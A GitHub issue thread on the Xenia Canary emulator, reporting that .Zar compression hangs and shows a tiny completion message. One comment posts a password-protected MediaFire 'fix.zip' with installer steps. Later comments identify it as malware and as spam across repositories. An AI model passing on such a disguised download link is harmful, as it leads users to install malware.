### ISSUE TITLE
Zar compression

### ISSUE THREAD

**Issue by Solitair69** [xenia-canary/xenia-canary#353]
### Validation

- [X] I've read the [FAQ](https://github.com/xenia-project/xenia/wiki/FAQ).
- [X] The Xenia build used is from the master branch (not MLBS/AlexVS/Canary/pull requests, etc.)
- [X] This issue isn't for tech support (help with Xenia).
- [X] If this issue occurs in a specific game, I've done analysis to locate the faulty subsystem of the emulator and a potential reason in it.
- [X] I've checked if this issue hasn't already been reported.
- [X] My device meets the minimum requirements: https://github.com/xenia-project/xenia/wiki/Quickstart#system-requirements
- [ ] (If building) I have read the building doc: https://github.com/xenia-project/xenia/blob/master/docs/building.md

### Describe what's going wrong

The recent Change to the .Zar compression lets Xenia canary hang Up Like the process isnt ending and also the completion Message is tiny

### Describe what should happen

Zar compression Task should quit after finishing and Message should be larger

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Solitair69** [comment]
oh thx that was quick but i am fine just wanted to give feedback
but btw i realized that the tiny message is just the start "create...."
theres still no message for finished

**Comment by databoose** [comment]
this is malware, report this ^^^

**Comment by ZolaKluke** [comment]
Same user was spamming on a thread I made in an entirely different project's repo

**Comment by Solitair69** [comment]
nvm
